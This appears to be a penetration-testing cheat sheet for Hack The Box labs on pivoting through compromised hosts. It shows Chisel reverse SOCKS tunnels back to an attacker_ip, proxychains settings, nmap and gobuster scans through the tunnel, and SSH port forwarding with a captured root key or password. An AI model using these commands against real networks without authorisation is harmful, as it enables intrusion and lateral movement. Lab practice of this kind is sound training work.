Pivot

Chisel :

################################# Attacker Machine ###############################
./chisel server -p 8080 --reverse
#################################### Pivot Machine ################################
chisel.exe client attacker_ip:8080 R:socks
############################### Proxychains.conf #################################
socks5 127.0.0.1 1080
################################## Nmap Scan ####################################
Always better to transfer binaries and scan from the pivot
nmap.exe -sC -sV 10.10.10.10 -Pn -T5 // From Pivot machine
proxychains nmap 10.10.10.10 -T5 -Pn -sT // From Kali Machine
################################### Gobuster ####################################
gobuster dir -u http://10.10.10.10 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -p socks5://127.0.0.1:1080

Pivot via SSH key (HTB Nibbles)

  • ssh -i root.key -L9000:web_ip:port ssh_ip

    • Ex : ssh -i root.key -L9000:10.10.10.75:80 10.10.10.73

Pivot via root password (HTB Sense)

  • ssh -D1080 pivot_ip

  • Burp -> user options -> socks proxy -> use socks proxy

  • vi /etc/proxychains.conf

  • Change socks4(metasploit) to socks5(ssh)

  • proxychains curl -k https://10.10.10.60 [ -k to ignore SSL]